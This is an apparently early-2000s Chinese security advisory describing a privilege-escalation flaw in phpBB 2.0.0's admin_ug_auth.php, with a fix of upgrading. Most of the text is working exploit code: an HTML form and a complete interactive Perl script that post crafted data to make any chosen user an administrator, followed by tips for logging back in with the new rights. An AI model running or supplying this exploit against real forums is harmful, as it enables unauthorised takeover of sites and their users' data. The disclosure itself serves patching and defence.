|
phpBB 2.0.0 用户权限可被非法提升缺陷
涉及程序:
phpBB 2.0.0
描述:
phpBB 2.0.0 用户权限可被非法提升缺陷
详细:
phpBB 是在MySQL数据库上用PHP后端语言写的UBB风格的讨论板。包含邮寄/回复/编辑消息,个人信息,个人论坛,用户和匿名邮件,意味深长的论题,通过提交或其它的特殊的顺序排队用户,可定义管理,排队和更多功能。
phpBB 2.0.0 被发现存在一个安全缺陷,任何恶意的普通用户都可以利用此缺陷非法将自己的权限提升到管理员级别,获得对系统的完全控制权限。
这是由于 phpBB 2.0.0 中脚本程序 admin_ug_auth.php 的一个译码错误引起的。admin_ug_auth.php 在 phpBB
2.0.0 中用于设置用户的权限。通常只有具有管理员权限才能访问 admin_ug_auth.php
,但是在这里脚本对普通用户的递交的非法数据却不会提出任何疑问,所以如果攻击者知道讨论板将要接收什么样的响应,直接递交企图执行的指令即可,如要求提升某个特定帐号为管理员等。下面就是一个HTML的攻击测试代码:
------------------
<html>
<head>
</head>
<body>
<form method="post"
action="http://www.domain_name/board_directory/admin/admin_ug_auth.php">
User Level: <select name="userlevel">
<option value="admin">Administrator</option>
<option value="user">User</option></select>
<input type="hidden" name="private[1]" value="0">
<input type="hidden" name="moderator[1]" value="0">
<input type="hidden" name="mode" value="user">
<input type="hidden" name="adv" value="">
User Number: <input type="text" name="u" size="5">
<input type="submit" name="submit" value="Submit">
</form>
</body>
</html>
攻击者如果要想利用以上代码成功地进行攻击,那么首先必须获得下面两点最基本的信息:
1. 讨论板(board)的基本目录(base directory)。如 http://www.mydomain.com/phpBB2 。
2. 必须知道要提升的帐号的用户号码(user number)。
需要注意的是在非法用户身份成功提升后,应尽快从讨论板中退出再重新登陆,否则不久将会得到一个错误的权限。
受影响程序:
phpBB 2.0.0
不受影响程序:
phpBB 2.0.0 以后版本
攻击方法:
"详细"一栏中是HTML攻击代码,下面是Perl攻击代码:
#!/usr/bin/perl
################################################################
# Copyright 2002 nick84 - Rootsecure.net #
# #
# You may use / modified this code as long as you leave this #
# here message in the source. #
# By using this code you agree to indemnify rootsecure.net #
# from any liability that might arise from its use. #
# #
# Selling this source code without prior consent is expressly #
# forbidden. :) #
# #
# By downloading this code you agree not to use it for any #
# illegal purpose. I.e. Only on forums you already have #
# administration rights over. #
# #
################################################################
# Header Info
print "Content-type: text/html\n\n";
print "root_a_phpBB_2.0.0.pl perl command line version\n";
print "Coded by nick84@ (http://www.rootsecure.net)\n\n";
# Usage Instructions Shown On Screen
print <<ENDHTML;
Usage Instructions (data gathering)
------------------
1. Goto the board you wish to change the permissions for in the normal way
using a browser.
2. Find the base directory location of the board for the script,
i.e. if the main page was http://www.server.com/phpBB2/index.php
the base directory location would be http://www.server.com/phpBB2
- without the trailing slash
3. Goto the boards "Memberlist" page (usually located at the top with the
rest of the links)
4. Search the "Memberlist" page for the specific account you wish to change
the permissions for, and click the username, then note down the number
at the end of the page URL you are at. (u=?)
5. Fill in the details obtained where asked for in the following prompts.
ENDHTML
# Continue When user Is Ready
print "Press enter to continue:";
$continue = <STDIN>;
# Clear The Screen
&clear_screen;
# Get Input From User
print "Boards Location:\n";
print "----------------\n";
print "e.g. (http://www.domain_name.com/phpBB2 Note: no trailing slash)\n";
print "Dont forget to use capitals if the name contains them\n";
print ":";
$board_location = <STDIN>;
chop $board_location;
print "\nUser ID:\n";
print "--------\n";
print "User ID of the user you wish to change the permissions for\n";
print "Found by clicking your profile on the Memberlist page, and\n";
print "then reading the end of the URL (where it says u=?)\n";
print ":";
$user_id = <STDIN>;
chop $user_id;
print "\nUser Level:\n";
print "-----------\n";
print "User level you wish to give to the specified user\n";
print "i.e. for admin type admin for user type user\n";
print ":";
$user_level = <STDIN>;
chop $user_level;
# Clear The Screen
&clear_screen;
# Print Out What The User Entered
print <<ENDHTML;
Details Entered
---------------
Board Location: $board_location
User ID No.: $user_id
User Level: $user_level
ENDHTML
# Confirm Details With User
print "\nIs this correct? (if it is press enter, otherwise controll-c)\n";
print ":";
$continue = <STDIN>;
print "\nWorking ...\n";
# Add One To Get The Correct User ID (not needed anymore)
#$user_id++;
# Compile Full String To Send
$post_dat="adv=&mode=user&moderator%5B1%5D=0&private%5B1%5D=0&submit=Submit&u=$user_id&userlevel=$user_level";
# Compile Full Location Of Boards Admin Page
$full_location="$board_location/admin/admin_ug_auth.php";
# Change Permissions On Specified Server
use LWP::UserAgent;
$ua = LWP::UserAgent->new;
my $req = HTTP::Request->new(POST => $full_location);
$req->content_type('application/x-www-form-urlencoded');
$req->content($post_dat);
my $res = $ua->request($req);
# Clear The Screen
&clear_screen;
print "\nFinished!\n";
# Display Final Usage Instructions
print <<ENDHTML;
Now go and log into the forum in the usual way. - If it was successful,
there will be a link at the bottom of every board page saying "Go to
Administration Panel" and additional options will appear on screen when
you are viewing a specific thread to enable you to edit or delete posts
in it etc.
ENDHTML
# print $res->as_string;
# Clear The Screen Subroutine
sub clear_screen {
for ($count=1; $count<101; $count++)
{
print "\n";
}
}
解决方案:
升级到 phpBB 2.0.0 以后版本
|